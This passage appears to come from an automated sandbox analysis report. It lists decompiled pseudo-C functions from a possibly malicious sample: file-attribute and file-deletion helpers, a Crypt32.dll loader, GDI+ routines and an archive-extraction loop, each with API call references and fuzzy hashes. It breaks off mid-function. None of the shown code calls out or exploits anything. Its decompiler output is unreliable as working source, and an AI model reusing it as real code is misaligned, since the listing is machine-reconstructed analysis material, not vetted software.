          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AllocateHeap$_free
          • String ID:
          • API String ID: 1482568997-0
          • Opcode ID: 216c189d9fba63a5074fd2272985c35b518a8e5a77a38918e91a0d106e87b941
          • Instruction ID: 1e5fe670b88ddd97fe230a9d7d52868ae576545259802e951cc7a1f376d201b9
          • Opcode Fuzzy Hash: 216c189d9fba63a5074fd2272985c35b518a8e5a77a38918e91a0d106e87b941
          • Instruction Fuzzy Hash: E4F0AF3153C106AA9B313E21AC45FEF37F89FF17A8B140156FC14A6190DB20DAE095A1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00200574(void* __ecx) {
          				long _v8;
          				long _v12;
          				int _t8;
          				void* _t14;
          				signed int _t15;
          				signed int _t17;
          
          				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
          				if(_t8 == 0) {
          					return _t8 + 1;
          				}
          				_t14 = 0;
          				_t17 = _v8;
          				_t15 = 1;
          				do {
          					if((_t17 & _t15) != 0) {
          						_t14 = _t14 + 1;
          					}
          					_t15 = _t15 + _t15;
          				} while (_t15 != 0);
          				if(_t14 >= 1) {
          					return _t14;
          				}
          				return 1;
          			}










          APIs
          • GetCurrentProcess.KERNEL32(?,?), ref: 00200581
          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00200588
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Process$AffinityCurrentMask
          • String ID:
          • API String ID: 1231390398-0
          • Opcode ID: a079b3d4fbec2d73014c9ff11a71c1dda4611d769132defcc4762223561fb101
          • Instruction ID: 52d2865e494207636473fbb4aca9016fd90bf9d578073c323ca7de15b1f4d020
          • Opcode Fuzzy Hash: a079b3d4fbec2d73014c9ff11a71c1dda4611d769132defcc4762223561fb101
          • Instruction Fuzzy Hash: 46E02B72E20306B7EF148AA49C44AAB77ADF718300F505079A902C3341F930DE154AA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 82%
          			E001FA12F(WCHAR* _a4, long _a8) {
          				short _v4100;
          				int _t12;
          				signed int _t18;
          				signed int _t19;
          
          				E0020D940();
          				_push(_t18);
          				_t12 = SetFileAttributesW(_a4, _a8); // executed
          				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
          				if(_t19 == 0 && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
          					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
          				}
          				return _t19;
          			}








          APIs
          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA143
          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA174
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: 070f0d288efe158f470c11377a2e27fbf8a2f139761656fce1f62f3cf0ad15a0
          • Instruction ID: 956041ead3e508339d465f4450b78198644afdd0c02f91eded29f6e71928c2fc
          • Opcode Fuzzy Hash: 070f0d288efe158f470c11377a2e27fbf8a2f139761656fce1f62f3cf0ad15a0
          • Instruction Fuzzy Hash: 9FF0A03114020DBBDF115FA0DC44FEA3B6CBF14381F848051BD8C86161DB32DAAAEA60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemText_swprintf
          • String ID:
          • API String ID: 3011073432-0
          • Opcode ID: 73923ad2c58d57114c754a3a1cc694e291aaebad5e6511bb126382bf351f9724
          • Instruction ID: 3d392ce3fa321526a5bd05d4fdcd3b838d8abe2d325579bbc9b5aa212e681109
          • Opcode Fuzzy Hash: 73923ad2c58d57114c754a3a1cc694e291aaebad5e6511bb126382bf351f9724
          • Instruction Fuzzy Hash: 0FF0E5B151834C3AEF21EBB0EC0BFA93B5D9B05741F9405A6FB05520F3E6726A305B62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 82%
          			E001F9E18(WCHAR* _a4) {
          				short _v4100;
          				int _t10;
          				signed int _t16;
          				signed int _t17;
          
          				E0020D940();
          				_push(_t16);
          				_t10 = DeleteFileW(_a4); // executed
          				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
          				if(_t17 == 0 && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
          					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
          				}
          				return _t17;
          			}








          APIs
          • DeleteFileW.KERNELBASE(?,?,?,001F9648,?,?,001F94A3), ref: 001F9E29
          • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,001F9648,?,?,001F94A3), ref: 001F9E57
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: 30ab28f4be4ec19422f62fc99b233df4e99591a13296c3ad856fcdf9d6155b6e
          • Instruction ID: abb807763355e2e7cc4a7bc87851a95a97ae5b59e8342eb2fe8a36ab12bad87c
          • Opcode Fuzzy Hash: 30ab28f4be4ec19422f62fc99b233df4e99591a13296c3ad856fcdf9d6155b6e
          • Instruction Fuzzy Hash: 53E02B3015120CB7DB11AF60DC44FF9335CAB04381F844061B948C2151DB72DD99D9A0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001F9E7F(WCHAR* _a4) {
          				short _v4100;
          				long _t6;
          				long _t11;
          				long _t13;
          
          				E0020D940();
          				_t6 = GetFileAttributesW(_a4); // executed
          				_t13 = _t6;
          				if(_t13 == 0xffffffff && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
          					_t11 = GetFileAttributesW( &_v4100); // executed
          					_t13 = _t11;
          				}
          				return _t13;
          			}








          APIs
          • GetFileAttributesW.KERNELBASE(?,?,?,001F9E74,?,001F74F7,?,?,?,?), ref: 001F9E90
          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001F9E74,?,001F74F7,?,?,?,?), ref: 001F9EBC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: c83cddf2044555e1f8711b7332ffda11545cc2fb8ddfb6d70211e9171d89137a
          • Instruction ID: fe63562bf0cfcde349469ccb85a32b6586b04fcc9ac7733d89e41829045e95e0
          • Opcode Fuzzy Hash: c83cddf2044555e1f8711b7332ffda11545cc2fb8ddfb6d70211e9171d89137a
          • Instruction Fuzzy Hash: 3BE01B3150015CB7CB21ABA4DC05BE9775CAB183E5F444161FE54D31D1D7719D59CAD0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FFCFD(intOrPtr _a4) {
          				short _v4100;
          				struct HINSTANCE__* _t7;
          
          				E0020D940();
          				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
          				if(_t7 != 0) {
          					E001FB625( &_v4100, _a4,  &_v4100, 0x800);
          					_t7 = LoadLibraryW( &_v4100); // executed
          				}
          				return _t7;
          			}






          APIs
          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DirectoryLibraryLoadSystem
          • String ID:
          • API String ID: 1175261203-0
          • Opcode ID: ecbebb430825c74a17d352095f2699128500b0158f151afb7647202866e7e00b
          • Instruction ID: b0a63e76b11204cdc502619d813fff53d140a768072942e1a3992dd1d89fb9db
          • Opcode Fuzzy Hash: ecbebb430825c74a17d352095f2699128500b0158f151afb7647202866e7e00b
          • Instruction Fuzzy Hash: 66E0127691111CBBDB219AD5DC08FEA776CEF1C391F4400A5BA48D2105DB75EA54CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 73%
          			E0020938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
          				signed int _v8;
          				signed int* _t10;
          				signed int _t15;
          
          				_push(__ecx);
          				_t15 = __ecx;
          				_t10 =  &_v8;
          				_v8 = __ecx;
          				_v8 = _v8 & 0x00000000;
          				_push(_t10);
          				_push(_a4);
          				 *__ecx = 0x223398;
          				if(_a8 == 0) {
          					L0020D80E(); // executed
          				} else {
          					L0020D814();
          				}
          				 *((intOrPtr*)(_t15 + 8)) = _t10;
          				 *(_t15 + 4) = _v8;
          				return _t15;
          			}







          APIs
          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002093AF
          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002093B6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: BitmapCreateFromGdipStream
          • String ID:
          • API String ID: 1918208029-0
          • Opcode ID: 8439fe8dfb1052135d350d10be0150dd19a4cc66912ff11dad88bca1853b731a
          • Instruction ID: a7d0219c2f40986f3787adc5e4528eea15373bed6cffad43e2a9e36c23e1d354
          • Opcode Fuzzy Hash: 8439fe8dfb1052135d350d10be0150dd19a4cc66912ff11dad88bca1853b731a
          • Instruction Fuzzy Hash: 28E06D71821318EBC720EF98C501699BBF8EB04320F10C09AE84593242D7B0AE649FA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E00209B08(void* __ecx) {
          				intOrPtr _v16;
          				intOrPtr* _t5;
          				void* _t7;
          				void* _t11;
          				intOrPtr _t14;
          
          				 *[fs:0x0] = _t14;
          				_t5 =  *0x2375c0; // 0x7442c100
          				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00221161, 0xffffffff);
          				L0020D826(); // executed
          				_t7 =  *0x22dff0( *((intOrPtr*)(__ecx + 4))); // executed
          				 *[fs:0x0] = _v16;
          				return _t7;
          			}









          APIs
          • GdiplusShutdown.GDIPLUS(?,?,?,00221161,000000FF), ref: 00209B31
          • OleUninitialize.OLE32(?,?,?,00221161,000000FF), ref: 00209B36
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: GdiplusShutdownUninitialize
          • String ID:
          • API String ID: 3856339756-0
          • Opcode ID: 817ef6326231a73147a9dc6c1cecf6ec43e2df9a84aef91c5ea6689bf20505bb
          • Instruction ID: a6f65206330ff8493d27f019f14ee5ebf0220931ded0f40dccaa0ed8185774dd
          • Opcode Fuzzy Hash: 817ef6326231a73147a9dc6c1cecf6ec43e2df9a84aef91c5ea6689bf20505bb
          • Instruction Fuzzy Hash: 3FE01A72958654AFC720DB88ED46B56B7A8FB09B20F004769F91A83B90DB356810CA91
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E00211726(void* __ecx, void* __eflags) {
          				intOrPtr _t1;
          				void* _t2;
          				void* _t9;
          
          				_t1 = E0021281A(__eflags, E0021166A); // executed
          				 *0x22d680 = _t1;
          				if(_t1 != 0xffffffff) {
          					_t2 = E002128C8(__eflags, _t1, 0x2501dc);
          					_pop(_t9);
          					__eflags = _t2;
          					if(_t2 != 0) {
          						return 1;
          					} else {
          						E00211759(_t9);
          						goto L1;
          					}
          				} else {
          					L1:
          					return 0;
          				}
          			}







          APIs
            • Part of subcall function 0021281A: try_get_function.LIBVCRUNTIME ref: 0021282F
          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00211744
          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0021174F
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
          • String ID:
          • API String ID: 806969131-0
          • Opcode ID: 7871a1b5dcfec8b3f4a19e75fe9b685f3f74708d271b10a069189ccfc8d2b77b
          • Instruction ID: e051d56b43987e1a4f6b17fc1d6a80a476c3622dfcb4c33585a709e701328f34
          • Opcode Fuzzy Hash: 7871a1b5dcfec8b3f4a19e75fe9b685f3f74708d271b10a069189ccfc8d2b77b
          • Instruction Fuzzy Hash: 93D0A7255B4702588D002A7078124DA57C844337703F05B45F220C62C2EB3040FBA825
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E001F12B2(struct HWND__* _a4, int _a8, signed char _a12) {
          				int _t8;
          
          				asm("sbb eax, eax");
          				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
          				return _t8;
          			}





          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemShowWindow
          • String ID:
          • API String ID: 3351165006-0
          • Opcode ID: 2b19f6247adb3e35cc978500213cff6acff152d1ac413931f0fee01405c2437e
          • Instruction ID: 9c71c51e01bb624fa749441f4777f85d92cda80083f96d93df9069c63f3f73fb
          • Opcode Fuzzy Hash: 2b19f6247adb3e35cc978500213cff6acff152d1ac413931f0fee01405c2437e
          • Instruction Fuzzy Hash: 20C01272058200BECB011BB0ED0DD2EBBA8ABA4212F14C908F0AAC04A0C238C010DB11
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E001F81C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
          				void* __esi;
          				void* _t47;
          				signed int _t50;
          				signed int _t51;
          				void* _t53;
          				signed int _t55;
          				signed int _t61;
          				intOrPtr _t73;
          				signed int _t80;
          				intOrPtr _t88;
          				void* _t89;
          				void* _t91;
          				intOrPtr _t93;
          				void* _t95;
          				void* _t98;
          
          				_t98 = __eflags;
          				_t90 = __edi;
          				_t88 = __edx;
          				_t73 = __ecx;
          				E0020D870(E002212D2, _t95);
          				E0020D940();
          				_t93 = _t73;
          				_t1 = _t95 - 0x9d58; // -38232
          				E001F137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
          				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
          				_t6 = _t95 - 0x9d58; // -38232
          				if(E001F9C0E(_t6, _t93 + 0xf4) != 0) {
          					_t7 = _t95 - 0x9d58; // -38232, executed
          					_t47 = E001F1973(_t7, _t88, 1); // executed
          					if(_t47 != 0) {
          						__eflags =  *((char*)(_t95 - 0x3093));
          						if( *((char*)(_t95 - 0x3093)) == 0) {
          							_push(__edi);
          							_t91 = 0;
          							__eflags =  *(_t95 - 0x30a3);
          							if( *(_t95 - 0x30a3) != 0) {
          								_t10 = _t95 - 0x9d3a; // -38202
          								_t11 = _t95 - 0x1010; // -2064
          								_t61 = E001FFAB1(_t11, _t10, 0x800);
          								__eflags =  *(_t95 - 0x309e);
          								while(1) {
          									_t17 = _t95 - 0x1010; // -2064
          									E001FB782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
          									_t18 = _t95 - 0x2058; // -6232
          									E001F6EF9(_t18);
          									_push(0);
          									_t19 = _t95 - 0x2058; // -6232
          									_t20 = _t95 - 0x1010; // -2064
          									_t61 = E001FA1B1(_t18, _t88, __eflags, _t20, _t19);
          									__eflags = _t61;
          									if(_t61 == 0) {
          										break;
          									}
          									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
          									asm("adc ebx, [ebp-0x1054]");
          									__eflags =  *(_t95 - 0x309e);
          								}
          								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
          								asm("adc [esi+0x9c], ebx");
          							}
          							_t23 = _t95 - 0x9d58; // -38232
          							E001F835C(_t93, _t88, _t23);
          							_t50 =  *(_t93 + 8);
          							_t89 = 0x49;
          							_pop(_t90);
          							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
          							__eflags = _t80 - 0x54;
          							if(_t80 == 0x54) {
          								L11:
          								 *((char*)(_t50 + 0x61f9)) = 1;
          							} else {
          								__eflags = _t80 - _t89;
          								if(_t80 == _t89) {
          									goto L11;
          								}
          							}
          							_t51 =  *(_t93 + 8);
          							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
          							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
          								__eflags =  *((char*)(_t51 + 0x61f9));
          								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
          								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
          								E00200FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
          							}
          							_t33 = _t95 - 0x9d58; // -38232
          							E001F1E4F(_t33, _t89);
          							do {
          								_t34 = _t95 - 0x9d58; // -38232
          								_t53 = E001F391A(_t34, _t89);
          								_t35 = _t95 - 0xd; // 0x7f3
          								_t36 = _t95 - 0x9d58; // -38232
          								_t55 = E001F83C0(_t93, _t36, _t53, _t35); // executed
          								__eflags = _t55;
          							} while (_t55 != 0);
          						}
          					} else {
          						E001F6E03(0x2300e0, 1);
          					}
          				}
          				_t37 = _t95 - 0x9d58; // -38232, executed
          				E001F162D(_t37, _t90, _t93); // executed
          				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
          				return 0;
          			}



















          APIs
          • __EH_prolog.LIBCMT ref: 001F81C9
            • Part of subcall function 001F137D: __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F137D: new.LIBCMT ref: 001F13FA
            • Part of subcall function 001F1973: __EH_prolog.LIBCMT ref: 001F1978
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: b2c97f09120631f06d6392339ee2768e7895106f5aa1d6fb7fdbe53132eb0a16
          • Instruction ID: d7022f6d2b4be1e6232eb5f0e0a8ab031fb2eff278fc196c5aa764974e9d3593
          • Opcode Fuzzy Hash: b2c97f09120631f06d6392339ee2768e7895106f5aa1d6fb7fdbe53132eb0a16
          • Instruction Fuzzy Hash: 9441627194065CAADB24EB61C855BFAB3B8AF50704F0504EAE649A3093DF74AFC8DB50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 72%
          			E00202A7F(void* __ecx, void* __edx) {
          				void* __edi;
          				void* __esi;
          				void* _t29;
          				signed int _t30;
          				signed int* _t36;
          				signed int _t38;
          				intOrPtr _t39;
          				intOrPtr _t42;
          				signed int _t44;
          				void* _t47;
          				void* _t48;
          				void* _t56;
          				void* _t60;
          				signed int _t65;
          				void* _t67;
          				void* _t69;
          				void* _t73;
          
          				_t56 = __edx;
          				_t48 = __ecx;
          				_t29 = E0020D870(E00221486, _t67);
          				_push(_t48);
          				_push(_t48);
          				_t60 = _t48;
          				_t44 = 0;
          				_t72 =  *((intOrPtr*)(_t60 + 0x20));
          				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
          					_push(0x400400); // executed
          					_t42 = E0020DB02(_t48, _t56, 0x400400, _t72); // executed
          					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
          					_t29 = E0020E920(_t60, _t42, 0, 0x400400);
          					_t69 = _t69 + 0x10;
          				}
          				_t73 =  *(_t60 + 0x18) - _t44;
          				if(_t73 == 0) {
          					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
          					_t30 = _t65;
          					 *(_t67 - 0x10) = _t65;
          					_t58 = _t30 * 0x4ae4 >> 0x20;
          					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
          					_t36 = E0020DB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
          					_pop(0x2300e0);
          					 *(_t67 - 0x14) = _t36;
          					 *(_t67 - 4) = _t44;
          					_t74 = _t36;
          					if(_t36 != 0) {
          						_push(E00201788);
          						_push(E00201611);
          						_push(_t65);
          						_t16 =  &(_t36[1]); // 0x4
          						_t44 = _t16;
          						 *_t36 = _t65;
          						_push(0x4ae4);
          						_push(_t44);
          						E0020D96D(_t58, _t74);
          					}
          					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
          					 *(_t60 + 0x18) = _t44;
          					_t29 = E0020E920(_t60, _t44, 0, _t65 * 0x4ae4);
          					if(_t65 != 0) {
          						_t38 = 0;
          						 *(_t67 - 0x10) = 0;
          						do {
          							_t47 =  *(_t60 + 0x18) + _t38;
          							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
          								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
          								_t39 = E00212B53(0x2300e0); // executed
          								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
          								0x2300e0 = 0x30c00;
          								if(_t39 == 0) {
          									E001F6D3A(0x2300e0);
          								}
          								_t38 =  *(_t67 - 0x10);
          							}
          							_t38 = _t38 + 0x4ae4;
          							 *(_t67 - 0x10) = _t38;
          							_t65 = _t65 - 1;
          						} while (_t65 != 0);
          					}
          				}
          				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
          				return _t29;
          			}





















          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: a91a5ade47aa2f03db015b8cb26474f4e1c72ed70c841027712d1d5b60c3db0a
          • Instruction ID: 3e54c4cb41262a0ce0c1ba4ff8fd40b47db5a07d059f6806bf87ed4845a6dd44
          • Opcode Fuzzy Hash: a91a5ade47aa2f03db015b8cb26474f4e1c72ed70c841027712d1d5b60c3db0a
          • Instruction Fuzzy Hash: A32106B1E61316ABDB14DFB48C45B6A77A8FB05318F00463AE505EB6C3D7709920CAA8
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 83%
          			E00209EEF(void* __ecx, void* __edx, void* __eflags) {
          				void* __edi;
          				void* __esi;
          				short _t33;
          				char _t36;
          				void* _t47;
          				void* _t50;
          				short _t55;
          				void* _t57;
          				void* _t58;
          				short _t60;
          				void* _t62;
          				intOrPtr _t64;
          				void* _t67;
          
          				_t67 = __eflags;
          				_t57 = __edx;
          				_t47 = __ecx;
          				E0020D870(E002214E1, _t62);
          				_push(_t47);
          				E0020D940();
          				_push(_t60);
          				_push(_t58);
          				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
          				 *((intOrPtr*)(_t62 - 4)) = 0;
          				E001F137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
          				 *((char*)(_t62 - 4)) = 1;
          				E001F1E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
          				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
